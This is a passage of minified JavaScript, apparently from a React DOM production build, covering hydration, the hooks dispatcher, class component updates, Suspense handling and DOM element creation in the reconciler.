if(null!==t.child){t.child.return=t,t=t.child;continue}if(t===e)break;for(;null===t.sibling;){if(null===t.return||t.return===e)return null;t=t.return}t.sibling.return=t.return,t=t.sibling}return null}var Vo=null,Fo=null,Wo=!1;function Do(e,t){var n=Ds(5,null,null,0);n.elementType="DELETED",n.type="DELETED",n.stateNode=t,n.return=e,n.flags=8,null!==e.lastEffect?(e.lastEffect.nextEffect=n,e.lastEffect=n):e.firstEffect=e.lastEffect=n}function Io(e,t){switch(e.tag){case 5:var n=e.type;return null!==(t=1!==t.nodeType||n.toLowerCase()!==t.nodeName.toLowerCase()?null:t)&&(e.stateNode=t,!0);case 6:return null!==(t=""===e.pendingProps||3!==t.nodeType?null:t)&&(e.stateNode=t,!0);default:return!1}}function Uo(e){if(Wo){var t=Fo;if(t){var n=t;if(!Io(e,t)){if(!(t=qa(n.nextSibling))||!Io(e,t))return e.flags=-1025&e.flags|2,Wo=!1,void(Vo=e);Do(Vo,n)}Vo=e,Fo=qa(t.firstChild)}else e.flags=-1025&e.flags|2,Wo=!1,Vo=e}}function $o(e){for(e=e.return;null!==e&&5!==e.tag&&3!==e.tag&&13!==e.tag;)e=e.return;Vo=e}function Go(e){if(e!==Vo)return!1;if(!Wo)return $o(e),Wo=!0,!1;var t=e.type;if(5!==e.tag||"head"!==t&&"body"!==t&&!Ia(t,e.memoizedProps))for(t=Fo;t;)Do(e,t),t=qa(t.nextSibling);if($o(e),13===e.tag){if(!(e=null!==(e=e.memoizedState)?e.dehydrated:null))throw Error(i(317));e:{for(e=e.nextSibling,t=0;e;){if(8===e.nodeType){var n=e.data;if("/$"===n){if(0===t){Fo=qa(e.nextSibling);break e}t--}else"$"!==n&&"$!"!==n&&"$?"!==n||t++}e=e.nextSibling}Fo=null}}else Fo=Vo?qa(e.stateNode.nextSibling):null;return!0}function qo(){Fo=Vo=null,Wo=!1}var Ko=[];function Xo(){for(var e=0;e<Ko.length;e++)Ko[e]._workInProgressVersionPrimary=null;Ko.length=0}var Qo=x.ReactCurrentDispatcher,Jo=x.ReactCurrentBatchConfig,Yo=0,ei=null,ti=null,ni=null,ai=!1,ri=!1;function oi(){throw Error(i(321))}function ii(e,t){if(null===t)return!1;for(var n=0;n<t.length&&n<e.length;n++)if(!ca(e[n],t[n]))return!1;return!0}function li(e,t,n,a,r,o){if(Yo=o,ei=t,t.memoizedState=null,t.updateQueue=null,t.lanes=0,Qo.current=null===e||null===e.memoizedState?Ai:Bi,e=n(a,r),ri){o=0;do{if(ri=!1,!(25>o))throw Error(i(301));o+=1,ni=ti=null,t.updateQueue=null,Qo.current=Hi,e=n(a,r)}while(ri)}if(Qo.current=zi,t=null!==ti&&null!==ti.next,Yo=0,ni=ti=ei=null,ai=!1,t)throw Error(i(300));return e}function si(){var e={memoizedState:null,baseState:null,baseQueue:null,queue:null,next:null};return null===ni?ei.memoizedState=ni=e:ni=ni.next=e,ni}function pi(){if(null===ti){var e=ei.alternate;e=null!==e?e.memoizedState:null}else e=ti.next;var t=null===ni?ei.memoizedState:ni.next;if(null!==t)ni=t,ti=e;else{if(null===e)throw Error(i(310));e={memoizedState:(ti=e).memoizedState,baseState:ti.baseState,baseQueue:ti.baseQueue,queue:ti.queue,next:null},null===ni?ei.memoizedState=ni=e:ni=ni.next=e}return ni}function ci(e,t){return"function"==typeof t?t(e):t}function di(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=ti,r=a.baseQueue,o=n.pending;if(null!==o){if(null!==r){var l=r.next;r.next=o.next,o.next=l}a.baseQueue=r=o,n.pending=null}if(null!==r){r=r.next,a=a.baseState;var s=l=o=null,p=r;do{var c=p.lane;if((Yo&c)===c)null!==s&&(s=s.next={lane:0,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null}),a=p.eagerReducer===e?p.eagerState:e(a,p.action);else{var d={lane:c,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null};null===s?(l=s=d,o=a):s=s.next=d,ei.lanes|=c,Vl|=c}p=p.next}while(null!==p&&p!==r);null===s?o=a:s.next=l,ca(a,t.memoizedState)||(Ri=!0),t.memoizedState=a,t.baseState=o,t.baseQueue=s,n.lastRenderedState=a}return[t.memoizedState,n.dispatch]}function ui(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=n.dispatch,r=n.pending,o=t.memoizedState;if(null!==r){n.pending=null;var l=r=r.next;do{o=e(o,l.action),l=l.next}while(l!==r);ca(o,t.memoizedState)||(Ri=!0),t.memoizedState=o,null===t.baseQueue&&(t.baseState=o),n.lastRenderedState=o}return[o,a]}function mi(e,t,n){var a=t._getVersion;a=a(t._source);var r=t._workInProgressVersionPrimary;if(null!==r?e=r===a:(e=e.mutableReadLanes,(e=(Yo&e)===e)&&(t._workInProgressVersionPrimary=a,Ko.push(t))),e)return n(t._source);throw Ko.push(t),Error(i(350))}function fi(e,t,n,a){var r=zl;if(null===r)throw Error(i(349));var o=t._getVersion,l=o(t._source),s=Qo.current,p=s.useState((function(){return mi(r,t,n)})),c=p[1],d=p[0];p=ni;var u=e.memoizedState,m=u.refs,f=m.getSnapshot,h=u.source;u=u.subscribe;var g=ei;return e.memoizedState={refs:m,source:t,subscribe:a},s.useEffect((function(){m.getSnapshot=n,m.setSnapshot=c;var e=o(t._source);if(!ca(l,e)){e=n(t._source),ca(d,e)||(c(e),e=us(g),r.mutableReadLanes|=e&r.pendingLanes),e=r.mutableReadLanes,r.entangledLanes|=e;for(var a=r.entanglements,i=e;0<i;){var s=31-Dt(i),p=1<<s;a[s]|=e,i&=~p}}}),[n,t,a]),s.useEffect((function(){return a(t._source,(function(){var e=m.getSnapshot,n=m.setSnapshot;try{n(e(t._source));var a=us(g);r.mutableReadLanes|=a&r.pendingLanes}catch(e){n((function(){throw e}))}}))}),[t,a]),ca(f,n)&&ca(h,t)&&ca(u,a)||((e={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:d}).dispatch=c=Pi.bind(null,ei,e),p.queue=e,p.baseQueue=null,d=mi(r,t,n),p.memoizedState=p.baseState=d),d}function hi(e,t,n){return fi(pi(),e,t,n)}function gi(e){var t=si();return"function"==typeof e&&(e=e()),t.memoizedState=t.baseState=e,e=(e=t.queue={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:e}).dispatch=Pi.bind(null,ei,e),[t.memoizedState,e]}function vi(e,t,n,a){return e={tag:e,create:t,destroy:n,deps:a,next:null},null===(t=ei.updateQueue)?(t={lastEffect:null},ei.updateQueue=t,t.lastEffect=e.next=e):null===(n=t.lastEffect)?t.lastEffect=e.next=e:(a=n.next,n.next=e,e.next=a,t.lastEffect=e),e}function _i(e){return e={current:e},si().memoizedState=e}function wi(){return pi().memoizedState}function bi(e,t,n,a){var r=si();ei.flags|=e,r.memoizedState=vi(1|t,n,void 0,void 0===a?null:a)}function xi(e,t,n,a){var r=pi();a=void 0===a?null:a;var o=void 0;if(null!==ti){var i=ti.memoizedState;if(o=i.destroy,null!==a&&ii(a,i.deps))return void vi(t,n,o,a)}ei.flags|=e,r.memoizedState=vi(1|t,n,o,a)}function yi(e,t){return bi(516,4,e,t)}function ki(e,t){return xi(516,4,e,t)}function Ei(e,t){return xi(4,2,e,t)}function Ci(e,t){return"function"==typeof t?(e=e(),t(e),function(){t(null)}):null!=t?(e=e(),t.current=e,function(){t.current=null}):void 0}function Si(e,t,n){return n=null!=n?n.concat([e]):null,xi(4,2,Ci.bind(null,t,e),n)}function Mi(){}function Li(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(n.memoizedState=[e,t],e)}function Ni(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(e=e(),n.memoizedState=[e,t],e)}function Zi(e,t){var n=Ir();$r(98>n?98:n,(function(){e(!0)})),$r(97<n?97:n,(function(){var n=Jo.transition;Jo.transition=1;try{e(!1),t()}finally{Jo.transition=n}}))}function Pi(e,t,n){var a=ds(),r=us(e),o={lane:r,action:n,eagerReducer:null,eagerState:null,next:null},i=t.pending;if(null===i?o.next=o:(o.next=i.next,i.next=o),t.pending=o,i=e.alternate,e===ei||null!==i&&i===ei)ri=ai=!0;else{if(0===e.lanes&&(null===i||0===i.lanes)&&null!==(i=t.lastRenderedReducer))try{var l=t.lastRenderedState,s=i(l,n);if(o.eagerReducer=i,o.eagerState=s,ca(s,l))return}catch(e){}ms(e,r,a)}}var zi={readContext:io,useCallback:oi,useContext:oi,useEffect:oi,useImperativeHandle:oi,useLayoutEffect:oi,useMemo:oi,useReducer:oi,useRef:oi,useState:oi,useDebugValue:oi,useDeferredValue:oi,useTransition:oi,useMutableSource:oi,useOpaqueIdentifier:oi,unstable_isNewReconciler:!1},Ai={readContext:io,useCallback:function(e,t){return si().memoizedState=[e,void 0===t?null:t],e},useContext:io,useEffect:yi,useImperativeHandle:function(e,t,n){return n=null!=n?n.concat([e]):null,bi(4,2,Ci.bind(null,t,e),n)},useLayoutEffect:function(e,t){return bi(4,2,e,t)},useMemo:function(e,t){var n=si();return t=void 0===t?null:t,e=e(),n.memoizedState=[e,t],e},useReducer:function(e,t,n){var a=si();return t=void 0!==n?n(t):t,a.memoizedState=a.baseState=t,e=(e=a.queue={pending:null,dispatch:null,lastRenderedReducer:e,lastRenderedState:t}).dispatch=Pi.bind(null,ei,e),[a.memoizedState,e]},useRef:_i,useState:gi,useDebugValue:Mi,useDeferredValue:function(e){var t=gi(e),n=t[0],a=t[1];return yi((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=gi(!1),t=e[0];return _i(e=Zi.bind(null,e[1])),[e,t]},useMutableSource:function(e,t,n){var a=si();return a.memoizedState={refs:{getSnapshot:t,setSnapshot:null},source:e,subscribe:n},fi(a,e,t,n)},useOpaqueIdentifier:function(){if(Wo){var e=!1,t=function(e){return{$$typeof:H,toString:e,valueOf:e}}((function(){throw e||(e=!0,n("r:"+(Xa++).toString(36))),Error(i(355))})),n=gi(t)[1];return 0==(2&ei.mode)&&(ei.flags|=516,vi(5,(function(){n("r:"+(Xa++).toString(36))}),void 0,null)),t}return gi(t="r:"+(Xa++).toString(36)),t},unstable_isNewReconciler:!1},Bi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:di,useRef:wi,useState:function(){return di(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=di(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=di(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return di(ci)[0]},unstable_isNewReconciler:!1},Hi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:ui,useRef:wi,useState:function(){return ui(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=ui(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=ui(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return ui(ci)[0]},unstable_isNewReconciler:!1},Ti=x.ReactCurrentOwner,Ri=!1;function Oi(e,t,n,a){t.child=null===e?Lo(t,null,n,a):Mo(t,e.child,n,a)}function ji(e,t,n,a,r){n=n.render;var o=t.ref;return oo(t,r),a=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,a,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Vi(e,t,n,a,r,o){if(null===e){var i=n.type;return"function"!=typeof i||Is(i)||void 0!==i.defaultProps||null!==n.compare||void 0!==n.defaultProps?((e=$s(n.type,null,a,t,t.mode,o)).ref=t.ref,e.return=t,t.child=e):(t.tag=15,t.type=i,Fi(e,t,i,a,r,o))}return i=e.child,0==(r&o)&&(r=i.memoizedProps,(n=null!==(n=n.compare)?n:ua)(r,a)&&e.ref===t.ref)?rl(e,t,o):(t.flags|=1,(e=Us(i,a)).ref=t.ref,e.return=t,t.child=e)}function Fi(e,t,n,a,r,o){if(null!==e&&ua(e.memoizedProps,a)&&e.ref===t.ref){if(Ri=!1,0==(o&r))return t.lanes=e.lanes,rl(e,t,o);0!=(16384&e.flags)&&(Ri=!0)}return Ii(e,t,n,a,o)}function Wi(e,t,n){var a=t.pendingProps,r=a.children,o=null!==e?e.memoizedState:null;if("hidden"===a.mode||"unstable-defer-without-hiding"===a.mode)if(0==(4&t.mode))t.memoizedState={baseLanes:0},xs(0,n);else{if(0==(1073741824&n))return e=null!==o?o.baseLanes|n:n,t.lanes=t.childLanes=1073741824,t.memoizedState={baseLanes:e},xs(0,e),null;t.memoizedState={baseLanes:0},xs(0,null!==o?o.baseLanes:n)}else null!==o?(a=o.baseLanes|n,t.memoizedState=null):a=n,xs(0,a);return Oi(e,t,r,n),t.child}function Di(e,t){var n=t.ref;(null===e&&null!==n||null!==e&&e.ref!==n)&&(t.flags|=128)}function Ii(e,t,n,a,r){var o=vr(n)?hr:mr.current;return o=gr(t,o),oo(t,r),n=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,n,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Ui(e,t,n,a,r){if(vr(n)){var o=!0;xr(t)}else o=!1;if(oo(t,r),null===t.stateNode)null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),bo(t,n,a),yo(t,n,a,r),a=!0;else if(null===e){var i=t.stateNode,l=t.memoizedProps;i.props=l;var s=i.context,p=n.contextType;p="object"==typeof p&&null!==p?io(p):gr(t,p=vr(n)?hr:mr.current);var c=n.getDerivedStateFromProps,d="function"==typeof c||"function"==typeof i.getSnapshotBeforeUpdate;d||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==a||s!==p)&&xo(t,i,a,p),lo=!1;var u=t.memoizedState;i.state=u,fo(t,a,i,r),s=t.memoizedState,l!==a||u!==s||fr.current||lo?("function"==typeof c&&(vo(t,n,c,a),s=t.memoizedState),(l=lo||wo(t,n,l,a,u,s,p))?(d||"function"!=typeof i.UNSAFE_componentWillMount&&"function"!=typeof i.componentWillMount||("function"==typeof i.componentWillMount&&i.componentWillMount(),"function"==typeof i.UNSAFE_componentWillMount&&i.UNSAFE_componentWillMount()),"function"==typeof i.componentDidMount&&(t.flags|=4)):("function"==typeof i.componentDidMount&&(t.flags|=4),t.memoizedProps=a,t.memoizedState=s),i.props=a,i.state=s,i.context=p,a=l):("function"==typeof i.componentDidMount&&(t.flags|=4),a=!1)}else{i=t.stateNode,po(e,t),l=t.memoizedProps,p=t.type===t.elementType?l:Qr(t.type,l),i.props=p,d=t.pendingProps,u=i.context,s="object"==typeof(s=n.contextType)&&null!==s?io(s):gr(t,s=vr(n)?hr:mr.current);var m=n.getDerivedStateFromProps;(c="function"==typeof m||"function"==typeof i.getSnapshotBeforeUpdate)||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==d||u!==s)&&xo(t,i,a,s),lo=!1,u=t.memoizedState,i.state=u,fo(t,a,i,r);var f=t.memoizedState;l!==d||u!==f||fr.current||lo?("function"==typeof m&&(vo(t,n,m,a),f=t.memoizedState),(p=lo||wo(t,n,p,a,u,f,s))?(c||"function"!=typeof i.UNSAFE_componentWillUpdate&&"function"!=typeof i.componentWillUpdate||("function"==typeof i.componentWillUpdate&&i.componentWillUpdate(a,f,s),"function"==typeof i.UNSAFE_componentWillUpdate&&i.UNSAFE_componentWillUpdate(a,f,s)),"function"==typeof i.componentDidUpdate&&(t.flags|=4),"function"==typeof i.getSnapshotBeforeUpdate&&(t.flags|=256)):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),t.memoizedProps=a,t.memoizedState=f),i.props=a,i.state=f,i.context=s,a=p):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),a=!1)}return $i(e,t,n,a,o,r)}function $i(e,t,n,a,r,o){Di(e,t);var i=0!=(64&t.flags);if(!a&&!i)return r&&yr(t,n,!1),rl(e,t,o);a=t.stateNode,Ti.current=t;var l=i&&"function"!=typeof n.getDerivedStateFromError?null:a.render();return t.flags|=1,null!==e&&i?(t.child=Mo(t,e.child,null,o),t.child=Mo(t,null,l,o)):Oi(e,t,l,o),t.memoizedState=a.state,r&&yr(t,n,!0),t.child}function Gi(e){var t=e.stateNode;t.pendingContext?wr(0,t.pendingContext,t.pendingContext!==t.context):t.context&&wr(0,t.context,!1),Bo(e,t.containerInfo)}var qi,Ki,Xi,Qi,Ji={dehydrated:null,retryLane:0};function Yi(e,t,n){var a,r=t.pendingProps,o=Oo.current,i=!1;return(a=0!=(64&t.flags))||(a=(null===e||null!==e.memoizedState)&&0!=(2&o)),a?(i=!0,t.flags&=-65):null!==e&&null===e.memoizedState||void 0===r.fallback||!0===r.unstable_avoidThisFallback||(o|=1),dr(Oo,1&o),null===e?(void 0!==r.fallback&&Uo(t),e=r.children,o=r.fallback,i?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,e):"number"==typeof r.unstable_expectedLoadTime?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,t.lanes=33554432,e):((n=qs({mode:"visible",children:e},t.mode,n,null)).return=t,t.child=n)):(e.memoizedState,i?(r=function(e,t,n,a,r){var o=t.mode,i=e.child;e=i.sibling;var l={mode:"hidden",children:n};return 0==(2&o)&&t.child!==i?((n=t.child).childLanes=0,n.pendingProps=l,null!==(i=n.lastEffect)?(t.firstEffect=n.firstEffect,t.lastEffect=i,i.nextEffect=null):t.firstEffect=t.lastEffect=null):n=Us(i,l),null!==e?a=Us(e,a):(a=Gs(a,o,r,null)).flags|=2,a.return=t,n.return=t,n.sibling=a,t.child=n,a}(e,t,r.children,r.fallback,n),i=t.child,o=e.child.memoizedState,i.memoizedState=null===o?{baseLanes:n}:{baseLanes:o.baseLanes|n},i.childLanes=e.childLanes&~n,t.memoizedState=Ji,r):(n=function(e,t,n,a){var r=e.child;return e=r.sibling,n=Us(r,{mode:"visible",children:n}),0==(2&t.mode)&&(n.lanes=a),n.return=t,n.sibling=null,null!==e&&(e.nextEffect=null,e.flags=8,t.firstEffect=t.lastEffect=e),t.child=n}(e,t,r.children,n),t.memoizedState=null,n))}function el(e,t,n,a){var r=e.mode,o=e.child;return t={mode:"hidden",children:t},0==(2&r)&&null!==o?(o.childLanes=0,o.pendingProps=t):o=qs(t,r,0,null),n=Gs(n,r,a,null),o.return=e,n.return=e,o.sibling=n,e.child=o,n}function tl(e,t){e.lanes|=t;var n=e.alternate;null!==n&&(n.lanes|=t),ro(e.return,t)}function nl(e,t,n,a,r,o){var i=e.memoizedState;null===i?e.memoizedState={isBackwards:t,rendering:null,renderingStartTime:0,last:a,tail:n,tailMode:r,lastEffect:o}:(i.isBackwards=t,i.rendering=null,i.renderingStartTime=0,i.last=a,i.tail=n,i.tailMode=r,i.lastEffect=o)}function al(e,t,n){var a=t.pendingProps,r=a.revealOrder,o=a.tail;if(Oi(e,t,a.children,n),0!=(2&(a=Oo.current)))a=1&a|2,t.flags|=64;else{if(null!==e&&0!=(64&e.flags))e:for(e=t.child;null!==e;){if(13===e.tag)null!==e.memoizedState&&tl(e,n);else if(19===e.tag)tl(e,n);else if(null!==e.child){e.child.return=e,e=e.child;continue}if(e===t)break e;for(;null===e.sibling;){if(null===e.return||e.return===t)break e;e=e.return}e.sibling.return=e.return,e=e.sibling}a&=1}if(dr(Oo,a),0==(2&t.mode))t.memoizedState=null;else switch(r){case"forwards":for(n=t.child,r=null;null!==n;)null!==(e=n.alternate)&&null===jo(e)&&(r=n),n=n.sibling;null===(n=r)?(r=t.child,t.child=null):(r=n.sibling,n.sibling=null),nl(t,!1,r,n,o,t.lastEffect);break;case"backwards":for(n=null,r=t.child,t.child=null;null!==r;){if(null!==(e=r.alternate)&&null===jo(e)){t.child=r;break}e=r.sibling,r.sibling=n,n=r,r=e}nl(t,!0,n,null,o,t.lastEffect);break;case"together":nl(t,!1,null,null,void 0,t.lastEffect);break;default:t.memoizedState=null}return t.child}function rl(e,t,n){if(null!==e&&(t.dependencies=e.dependencies),Vl|=t.lanes,0!=(n&t.childLanes)){if(null!==e&&t.child!==e.child)throw Error(i(153));if(null!==t.child){for(n=Us(e=t.child,e.pendingProps),t.child=n,n.return=t;null!==e.sibling;)e=e.sibling,(n=n.sibling=Us(e,e.pendingProps)).return=t;n.sibling=null}return t.child}return null}function ol(e,t){if(!Wo)switch(e.tailMode){case"hidden":t=e.tail;for(var n=null;null!==t;)null!==t.alternate&&(n=t),t=t.sibling;null===n?e.tail=null:n.sibling=null;break;case"collapsed":n=e.tail;for(var a=null;null!==n;)null!==n.alternate&&(a=n),n=n.sibling;null===a?t||null===e.tail?e.tail=null:e.tail.sibling=null:a.sibling=null}}function il(e,t,n){var a=t.pendingProps;switch(t.tag){case 2:case 16:case 15:case 0:case 11:case 7:case 8:case 12:case 9:case 14:return null;case 1:case 17:return vr(t.type)&&_r(),null;case 3:return Ho(),cr(fr),cr(mr),Xo(),(a=t.stateNode).pendingContext&&(a.context=a.pendingContext,a.pendingContext=null),null!==e&&null!==e.child||(Go(t)?t.flags|=4:a.hydrate||(t.flags|=256)),Ki(t),null;case 5:Ro(t);var o=Ao(zo.current);if(n=t.type,null!==e&&null!=t.stateNode)Xi(e,t,n,a,o),e.ref!==t.ref&&(t.flags|=128);else{if(!a){if(null===t.stateNode)throw Error(i(166));return null}if(e=Ao(Zo.current),Go(t)){a=t.stateNode,n=t.type;var l=t.memoizedProps;switch(a[Ja]=t,a[Ya]=l,n){case"dialog":Za("cancel",a),Za("close",a);break;case"iframe":case"object":case"embed":Za("load",a);break;case"video":case"audio":for(e=0;e<Sa.length;e++)Za(Sa[e],a);break;case"source":Za("error",a);break;case"img":case"image":case"link":Za("error",a),Za("load",a);break;case"details":Za("toggle",a);break;case"input":ee(a,l),Za("invalid",a);break;case"select":a._wrapperState={wasMultiple:!!l.multiple},Za("invalid",a);break;case"textarea":se(a,l),Za("invalid",a)}for(var p in ke(n,l),e=null,l)l.hasOwnProperty(p)&&(o=l[p],"children"===p?"string"==typeof o?a.textContent!==o&&(e=["children",o]):"number"==typeof o&&a.textContent!==""+o&&(e=["children",""+o]):s.hasOwnProperty(p)&&null!=o&&"onScroll"===p&&Za("scroll",a));switch(n){case"input":X(a),ae(a,l,!0);break;case"textarea":X(a),ce(a);break;case"select":case"option":break;default:"function"==typeof l.onClick&&(a.onclick=Va)}a=e,t.updateQueue=a,null!==a&&(t.flags|=4)}else{switch(p=9===o.nodeType?o:o.ownerDocument,e===de.html&&(e=ue(n)),e===de.html?"script"===n?((e=p.createElement("div")).innerHTML="<script><\/script>",e=e.removeChild(e.firstChild)):"string"==typeof a.is?e=p.createElement(n,{is:a.is}):(e=p.createElement(n),"select"===n&&(p=e,a.multiple?p.multiple=!0:a.size&&(p.size=a.size))):e=p.createElementNS(e,n),e[Ja]=t,e[Ya]=a,qi(e,t,!1,!1),t.stateNode=e,p=Ee(n,a),n){case"dialog":Za("cancel",e),Za("close",e),o=a;break;case"iframe":case"object":case"embed":Za("load",e),o=a;break;case"video":case"audio":for(o=0;o<Sa.length;o++)Za(Sa[o],e);o=a;break;case"source":Za("error",e),o=a;break;case"img":case"image":case"link":Za("error",e),Za("load",e),o=a;break;case"details":Za("toggle",e),o=a;break;case"input":ee(e,a),o=Y(e,a),Za("invalid",e);break;case"option":o=oe(e,a);break;case"select":e._wrapperState={wasMultiple:!!a.multiple},o=r({},a,{value:void 0}),Za("invalid",e);break;case"textarea":se(e,a),o=le(e,a),Za("invalid",e);break;default:o=a}ke(n,o);var c=o;for(l in c)if(c.hasOwnProperty(l)){var d=c[l];"style"===l?xe(e,d):"dangerouslySetInnerHTML"===l?null!=(d=d?d.__html:void 0)&&ge(e,d):"children"===l?"string"==typeof d?("textarea"!==n||""!==d)&&ve(e,d):"number"==typeof d&&ve(e,""+d):"suppressContentEditableWarning"!==l&&"suppressHydrationWarning"!==l&&"autoFocus"!==l&&(s.hasOwnProperty(l)?null!=d&&"onScroll"===l&&Za("scroll",e):null!=d&&b(e,l,d,p))}switch(n){case"input":X(e),ae(e,a,!1);break;case"textarea":X(e),ce(e);break;case"option":null!=a.value&&e.setAttribute("value",""+q(a.value));break;case"select":e.multiple=!!a.multiple,null!=(l=a.value)?ie(e,!!a.multiple,l,!1):null!=a.defaultValue&&ie(e,!!a.multiple,a.defaultValue,!0);break;default:"function"==typeof o.onClick&&(e.onclick=Va)}Da(n,a)&&(t.flags|=4)}null!==t.ref&&(t.flags|=128)}return null;case 6:if(e&&null!=t.stateNode)Qi(e,t,e.memoizedProps,a);else{if("string"!=typeof a&&null===t.stateNode)throw Error(i(166));n=Ao(zo.current),Ao(Zo.current),Go(t)?(a=t.stateNode,n=t.memoizedProps,a[Ja]=t,a.nodeValue!==n&&(t.flags|=4)):((a=(9===n.nodeType?n:n.ownerDocument).createTextNode(a))[Ja]=t,t.stateNode=a)}return null;case 13:return cr(Oo),a=t.memoizedState,0!=(64&t.flags)?(t.lanes=n,t):(a=null!==a,n=!1,null===e?void 0!==t.memoizedProps.fallback&&Go(t):n=null!==e.memoizedState,a&&!n&&0!=(2&t.mode)&&(null===e&&!0!==t.memoizedProps.unstable_avoidThisFallback||0!=(1&Oo.current)?0===Rl&&(Rl=3):(0!==Rl&&3!==Rl||(Rl=4),null===zl||0==(134217727&Vl)&&0==(134217727&Fl)||vs(zl,Bl))),(a||n)&&(t.flags|=4),null);case 4:return Ho(),Ki(t),null===e&&za(t.stateNode.containerInfo),null;case 10:return ao(t),null;case 19:if(cr(Oo),null===(a=t.memoizedState))return null;if(l=0!=(64&t.flags),null===(p=a.rendering))if(l)ol(a,!1);else{if(0!==Rl||null!==e&&0!=(64&e.flags))for(e=t.child;null!==e;){if(null!==(p=jo(e))){for(t.flags|=64,ol(a,!1),null!==(l=p.updateQueue)&&(t.updateQueue=l,t.flags|=4),null===a.lastEffect&&(t.firstEffect=null),t.lastEffect=a.lastEffect,a=n,n=t.child;null!==n;)e=a,(l=n).flags&=2,l.nextEffect=null,l.firstEffect=null,l.lastEffect=null,null===(p=l.alternate)?(l.childLanes=0,l.lanes=e,l.child=null,l.memoizedProps=null,l.memoizedState=null,l.updateQueue=null,l.dependencies=null,l.stateNode=null):(l.childLanes=p.childLanes,l.lanes=p.lanes,l.child=p.child,l.memoizedProps=p.memoizedProps,l.memoizedState=p.memoizedState,l.updateQueue=p.updateQueue,l.type=p.type,e=p.dependencies,l.dependencies=null===e?null:{lanes:e.lanes,firstContext:e.firstContext}),n=n.sibling;return dr(Oo,1&Oo.current|2),t.child}e=e.sibling}null!==a.tail&&Dr()>Ul&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432)}else{if(!l)if(null!==(e=jo(p))){if(t.flags|=64,l=!0,null!==(n=e.updateQueue)&&(t.updateQueue=n,t.flags|=4),ol(a,!0),null===a.tail&&"hidden"===a.tailMode&&!p.alternate&&!Wo)return null!==(t=t.lastEffect=a.lastEffect)&&(t.nextEffect=null),null}else 2*Dr()-a.renderingStartTime>Ul&&1073741824!==n&&(t.flags|=64,l=!0,ol(a,!1),t.lanes=33554432);a.isBackwards?(p.sibling=t.child,t.child=p):(null!==(n=a.last)?n.sibling=p:t.child=p,a.last=p)}return null!==a.tail?(n=a.tail,a.rendering=n,a.tail=n.sibling,a.lastEffect=t.lastEffect,a.renderingStartTime=Dr(),n.sibling=null,t=Oo.current,dr(Oo,l?1&t|2:1&t),n):null;case 23:case 24:return ys(),null!==e&&null!==e.memoizedState!=(null!==t.memoizedState)&&"unstable-defer-without-hiding"!==a.mode&&(t.flags|=4),null}throw Error(i(156,t.tag))}function ll(e){switch(e.tag){case 1:vr(e.type)&&_r();var t=e.flags;return 4096&t?(e.flags=-4097&t|64,e):null;case 3:if(Ho(),cr(fr),cr(mr),Xo(),0!=(64&(t=e.flags)))throw Error(i(285));return e.flags=-4097&t|64,e;case 5:return Ro(e),null;case 13:return cr(Oo),4096&(t=e.flags)?(e.flags=-4097&t|64,e):null;case 19:return cr(Oo),null;case 4:return Ho(),null;case 10:return ao(e),null;case 23:case 24:return ys(),null;default:return null}}function sl(e,t){try{var n="",a=t;do{n+=$(a),a=a.return}while(a);var r=n}catch(e){r="\nError generating stack: "+e.message+"\n"+e.stack}return{value:e,source:t,stack:r}}function pl(e,t){try{console.error(t.value)}catch(e){setTimeout((function(){throw e}))}}qi=function(e,t){for(var n=t.child;null!==n;){if(5===n.tag||6===n.tag)e.appendChild(n.stateNode);else if(4!==n.tag&&null!==n.child){n.child.return=n,n=n.child;continue}if(n===t)break;for(;null===n.sibling;){if(null===n.return||n.return===t)return;n=n.return}n.sibling.return=n.return,n=n.sibling}},Ki=function(){},Xi=function(e,t,n,a){var o=e.memoizedProps;if(o!==a){e=t.stateNode,Ao(Zo.current);var 